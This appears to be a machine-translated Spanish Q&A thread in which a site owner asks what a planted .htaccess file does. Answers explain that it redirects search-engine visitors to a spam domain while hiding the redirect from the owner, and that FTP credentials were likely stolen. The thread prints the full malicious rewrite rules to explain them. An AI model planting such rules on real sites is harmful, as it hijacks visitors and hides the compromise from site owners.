Archivo .htaccess sospechoso

20

Esto se cargó en una de mis carpetas FTP. No estoy familiarizado con Apache, pero todavía tengo curiosidad: ¿alguien puede decirme qué tipo de acto cobarde está intentando cometer este archivo? ¡Gracias!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2 security mod-rewrite .htaccess ovinófilo
fuente
1
¡BONITO! (De una manera malvada ...) Básicamente, es tomar a todos los que vienen a su sitio desde un motor de búsqueda y redirigirlos a SPAMMER.info
KPWINC
¿Me ha pasado esto alguna vez? El .htaccessarchivo agregado a mi sitio tenía unas 40 líneas en blanco en la parte superior, solo para confundirme más.
TRiG

Respuestas:

15

Eso envía a los usuarios que provienen de un motor de búsqueda al último sitio SPAMMER.info(vea el historial de preguntas para el sitio real ).

Busca referencias en un intento de esconderse de usted , ya que es probable que no acceda al sitio a través de motores de búsqueda. Es decir, si va directamente a la URL, todo parece normal. Sin embargo, si ingresa a través de un motor de búsqueda, será redirigido.

Nota: esto no afecta a los rastreadores web, ya que ( googlebot, al menos ) no establecen el encabezado de referencia.

Michael Haren
fuente
8

Cada vez que un usuario de un motor de búsqueda alguna página de su sitio, será redirigido al sitio de spam .info.

Es muy astuto: no notarás que algo está mal, ya que normalmente solo escribirás la dirección.

Greg
fuente
1
Dado que está mirando al referente, ¿no redirigirá ningún clic que provenga de un motor de búsqueda?
¿No afecta también a los enlaces de Google? Por ejemplo, ¿busca el sitio del OP en Google, hace clic en él y es redirigido desde que proviene de Google?
Sí, solo enlaces de motores de búsqueda (como dije en mi respuesta) pero no rastreadores / bots de motores de búsqueda. Esta respuesta se ha actualizado, por lo que ahora es correcta. Originalmente indicó que esto se aplicaba solo a los bots.
Michael Haren el
1

para agregar más: lo más probable es que tus credenciales de ftp se hayan filtrado. tal vez los haya guardado en filezilla / total commander, etc. hay un montón de malware que los roba y luego los `` recorre '': iniciar sesión en cuentas ftp, adjuntar javascript malicioso a index.php / html o poner archivos de reescritura similares.

pQd
fuente
Estoy enfrentando este problema. Día después de que otro archivo .htaccess se modifique, lo que da como resultado un error interno del servidor.
vnix27